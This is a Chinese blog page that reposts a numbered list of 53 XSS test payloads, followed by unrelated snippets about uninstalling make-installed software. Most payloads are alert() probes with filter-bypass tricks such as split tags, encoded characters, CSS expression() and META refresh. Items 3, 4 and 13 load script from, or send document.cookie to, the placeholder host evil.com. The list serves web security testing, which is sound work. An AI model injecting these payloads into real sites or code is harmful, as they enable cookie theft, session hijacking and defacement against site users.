xss测试用例

最新推荐文章于 2023-12-19 16:52:20 发布
最新推荐文章于 2023-12-19 16:52:20 发布
阅读量225 收藏
点赞数
文章标签: 测试 javascript php ViewUI
原文链接:http://www.cnblogs.com/bl8ck/p/9610294.html
版权

1.<script> alert(1);</script>

2.<script>alert('xss');</script>

3.<script  src="http://www.evil.com/cookie.php"></script>

4.<script>location.href="http://www.evil.com/cookies.php?cookie="+escape(document.cookie)"</script>

5.<scr<script>ipt>alert('xss');</scr</script>ipt>

6.<img src=liu.jpg οnerrοr=alert(/xss/)/>

7.<style>@im\port'\ja\vasc\ript:alert(\"xss\")';</style>

8.<?echo('<src)'; echo('ipt>alert(\"xss\")';</script>');?>

9.<marquee><script>alert('xss')</script></marquee>

10.<IMG SRC=\"jav&#0x9;ascript:alert('xss');\">

11.<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

12."><script>alert(1)</script>

13.<script src=http://www.evil.com/files.js></script>

14.</title><script>alert(/xss/)</script>

15.</textarea><script>alert(/xss)</script>

16.<IMG LOWSRC=\"javascript:alert('XSS')\">

17.<IMG DYNSRC=\"javascript:alert('XSS')\">

18.<font style='color:expression(alert(document.cookie))'>

19.');alert('XSS

20.<img src="javascript:alert('XSS')">

21.[url=javascript:alert('XSS');]click me[/url]

22.<body οnunlοad="javascript:alert('XSS');">

23.<body onLoad="alert('XSS');"

24.[color=red' οnmοuseοver="alert('XSS')"]mouse over[/color]

25."/></a></><img src=1.gif οnerrοr=alert(1)>

26.window.alert("XSS");

27.<div style="x:expression((window==1)?":eval('r=1;alert(String.fromCharCode(83,83,83));'))">

28.<iframe<?php eval chr(11)?>οnlοad=alert('XSS')></iframe>

29."><script alert(String.fromCharCode(88,83,83))</script>

30.'>><marquee><h1>XSS<h1></marquee>

31.'">><script>alert('xss')</script>

32.'">><marquee><h1>XSS</h1></marquee>

33.<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">

34.<META HTTP-EQUIV=\"refresh\"CONTENT=\"0;URL=http://;url=javascript:alert('XSS');\">

35.<script>var var=1; alert(var)</script>

36.<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

37.<?='<SCRIPT>alert("XSS")</SCRIPT>'?>

38.<IMG SRC='vbscript:msgbox(\"XSS\")'>

39."οnfοcus=alert(document.domain)"><"

40.<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>

41.<STYLE>li {list-style-image:url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS

42.<br size=\"&{alert('xss')}\">

43.<scrscriptipt>alert(1)</scrscriptipt>

44."><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

45.[color=red width=expression(alert(123))][color]

46.<BASE HREF="javascript:alert('XSS');//">

47.Execute(MsgBox(chr(88)&&chr(83)&&chr(83)))<

48."></iframe><script>alert(123)</script>

49.<body onLoad="while(true) alert('XSS');">

50."<marquee><img src=k.png οnerrοr=alert(/xss/) />

51.<div style="background:url('javascript:')

52.<img src='java\nscript:alert(\"XSS\")'>

53.>'"><img src="javascript:alert('xss')">

转载于:https://www.cnblogs.com/bl8ck/p/9610294.html

E4857632
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
怎么卸载make install 编译(源码)安装软件
weixin_33676492的博客
03-07 571
在linux 中用 ./configure &amp;&amp; make &amp;&amp; make install 后,如果想删除这个软件我应该怎么删除呢?好像有一个叫"make uninstall"的东西,但是没有发现   如果安装的时候指定了prefix,直接删除就好。如果没有,并且源代码没有提供make uninstall/distclean/veryclean的功能,我一般...
CentOS 6.4下编译安装MySQL5.6.14教程
01-19
概述: CentOS 6.4下通过yum安装的MySQL是5.1版的,比较老,所以就想通过源代码安装高版本的5.6.14。 正文: 一、卸载旧版本 使用下面的命令检查是否安装有MySQL Server rpm -qa | grep mysql 有的话通过下面的命令来卸载掉 rpm -e mysql //普通删除模式 rpm -e --nodeps mysql // 强力删除模式,如果使用上面命令删除时, 提示有依赖的其它文件,则用该命令可以对其进行强力删除 二、安装MySQL 安装编译代码需要的包 yum -y install make gcc-c++ cmake bison-de
linux系统 make install 安装的库,最简单卸载方法
elwlb的博客
08-28 531
make install命令安装后找不到卸载文件。
一个软件包通过编译源代码安装后,如何完全的卸载??
advance1989的专栏
06-06 1万+
 一个软件包通过编译源代码安装后,如何完全的卸载??    如果原先的source还在的话,很多source的Makefile都有写uninstall规则,直接在Souce里make uninstall就可行,不过碰到无良作者没写的,那一句一句看Makefile里install部分他都干了些什么,然后挨个删除。    如果source没了.....那就一边郁闷吧    到目
Linux下如何用configure、makemake install编译安装卸载程序
Gelin的博客
12-06 656
源码的安装一般由3个步骤组成:配置(configure)、编译make)、安装make install)。安装成功的源码就是所谓的可执行文件,在你不需要的时候,也是可以删除/卸载(remove/uninstall)的。下面就逐个进行分析: 一、源码的配置 配置命令就是configure命令。一般来说,configure文件是位于源码根目录下的一个可执行的脚本文件,它有很多选项,而且不同软件的选项都不完全一致。可以在待安装的源码目录下使用命令./configure –help可以输...
sudo make install卸载
最新发布
qq_45520011的博客
12-19 661
.
Linux 中make install安装软件怎么卸载掉?
热门推荐
亭子的专栏
07-27 4万+
make的原理是执行一个叫Makefile文件里的指令,make的基本用处是自动根据makefile里的指令来编译源文件。它还可以用来做比如安装软件卸载软件等事情,但前提是作者在makefile里写了。比如makefile里有这么些内容: ... install : 然后用make install的话,make程序就会按照上面install:后面的指令执行安装,uninstall也是一样的道理,大部分的作者会写有卸载的部分,这时只要简单地执行make unistall 就可以,如果作者懒没有
怎么卸载make install 编译安装软件
weixin_44913177的博客
03-14 3878
在linux 中用 ./configure && make && make install 后,如果想删除这个软件我应该怎么删除呢? 好像有一个叫"make uninstall"的东西,但是没有发现.查了一番后发现知乎一个大佬推荐的方法还行,转载一下方便以后查阅。 一般来说,make install完了目录下会有一个install_mainfest.txt的文件记录了安装的所有内容,然后sudo xargs rm < install_manifest....
linux 卸载编译安装软件
weixin_30332241的博客
12-29 329
有些软件会有 make uninstall 之类的功能,但大多都没有,所以只有手动删除,或者在configure的时候加个preifx参数,比如 --preifx=/opt/squid,这样当你不用的时候直接rm -rf /opt/squid 就可以了。 转载于:https://www.cnblogs.com/carlo-jie/p/6234014.html...
linux下删除编译安装软件,Linux 中卸载编译安装软件
weixin_33970994的博客
05-01 2241
make instllmake的原理是执行一个叫Makefile文件里的指令,make的基本用处是自动根据makefile里的指令来编译源文件。它还可以用来做比如安装软件卸载软件等事情,但前提是作者在makefile里写了。比如makefile里有这么些内容:...install : < commands >然后用make install的话,make程序就会按照上面install...
如何卸载源码编译安装软件
亭子的专栏
07-07 684
<br />http://hi.baidu.com/sdusoul/blog/item/4afe37ddfdc548e477c638c8.html
CentOS 最新版本git的安装教程
01-10
CentOS6.5自带的git版本是1.7.1 卸载自带的git # yum remove git 下载最新版git # wget https://github.com/git/git/archive/v2.9.2.tar.gz 解压 # tar zxvf v2.9.2.tar.gz # cd git-2.9.2 编译安装 # make configure # ./configure --prefix=/usr/local/git --with-iconv=/usr/local/libiconv # make all doc # sudo make install install-do
linux下open-vswitch安装卸载操作
01-20
一. ovs 从源码编译安装安装依赖项: # apt install make # apt install gcc # apt install build-essential # apt install libssl-dev # apt install libcap-ng-dev # apt install python2.7 # apt install python-pip # pip install six # apt install autoconf # apt install automake # apt install libtool 下载源码包 # apt install
\linux下 mysql的安装卸载
04-23
linux下 mysql的安装卸载 二进制版本的mysql是已经编译好的,无需 configure ,make make install 等步骤,只需配置一 下即可使用,卸载也方便,直接删除即可;现在以mysql-standard-4.1.13-pc-linux-gnu-i686.tar.gz 版本做介绍
Git 使用源代码包编译、配置部署和使用 && 使用包管理工具安装
01-07
文章目录目录准备编译安装使用测试使用包管理工具安装卸载、查询安装位置 目录准备 使用普通用户执行一下即可。如wuyujin。(新建用户命令:useradd wuyujin) 下载 wget ...
MySQL5.7.10 安装文档教程详解
12-16
yum -y install gcc-c++ ncurses-devel cmake make perl gcc autoconf automake zlib libxml libgcrypt libtool bison 2、安装boost库: 首先先查询是否已经安装过boost rpm -qa boost* 卸载旧boost-*等库: yum -...
ubuntu安装eigen3.3.7
reason的博客
03-04 9936
查看已安装版本: gedit /usr/include/eigen3/Eigen/src/Core/util/Macros.h 或 gedit /usr/local/include/eigen3/Eigen/src/Core/util/Macros.h 卸载先前版本: sudo updatedb locate eigen3 得到eigen库的位置 卸载: sudo rm -rf /usr/include/eigen3 /usr/lib/cmake/eigen3 ...
catkin:: 解决find_package(catkin) failed.
reason的博客
05-27 5755
背景: 不安装ros的情况下,使用catkin进行项目工程管理。 一种方法是 直接将catkin package放到项目工程中,这样每个工程都要复制一个,太麻烦。 另一种方法是,安装catkin及其依赖项。但可能是ros未安装的原因,cmake .. 时总是找不到catkin,以下是解决方法。 问题描述: 源码make install安装完catkin之后,在工程文件中输入指令: mkdir build cd build cmake .. 报错如下: 解决流程 这个报错来自于最外层
Ubuntu 使用make安装卸载软件
05-20
在 Ubuntu 中,我们可以使用 Make 工具来安装卸载一些软件Make 是一个非常强大的自动化工具,它可以根据预先定义的规则和指令来自动化编译安装卸载软件。 以下是使用 Make 工具安装卸载软件的步骤: 1. 安装软件所需的依赖项: 在终端中输入以下命令: ``` sudo apt-get install build-essential ``` 这将安装一些必要的编译工具和依赖项。 2. 下载软件源代码: 使用浏览器或 wget 命令下载软件的源代码。例如,如果要下载示例软件的源代码,则可以运行以下命令: ``` wget https://example.com/software.tar.gz ``` 3. 解压缩源代码: 使用 tar 命令解压缩下载的源代码文件。例如,如果下载的文件名为 software.tar.gz,则可以运行以下命令: ``` tar -xvzf software.tar.gz ``` 4. 进入解压后的目录: 使用 cd 命令进入解压后的目录。例如,如果解压后的目录名为 software,则可以运行以下命令: ``` cd software ``` 5. 编译源代码: 运行以下命令来编译源代码: ``` make ``` 这将根据 Makefile 文件中的规则来编译源代码。 6. 安装软件: 运行以下命令来安装软件: ``` sudo make install ``` 这将根据 Makefile 文件中的规则来安装软件。 7. 卸载软件: 如果要卸载软件,则可以在软件源代码目录中运行以下命令: ``` sudo make uninstall ``` 这将根据 Makefile 文件中的规则来卸载软件。 请注意,不是所有软件都使用 Make 工具进行安装卸载。有些软件可能使用其他工具或方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值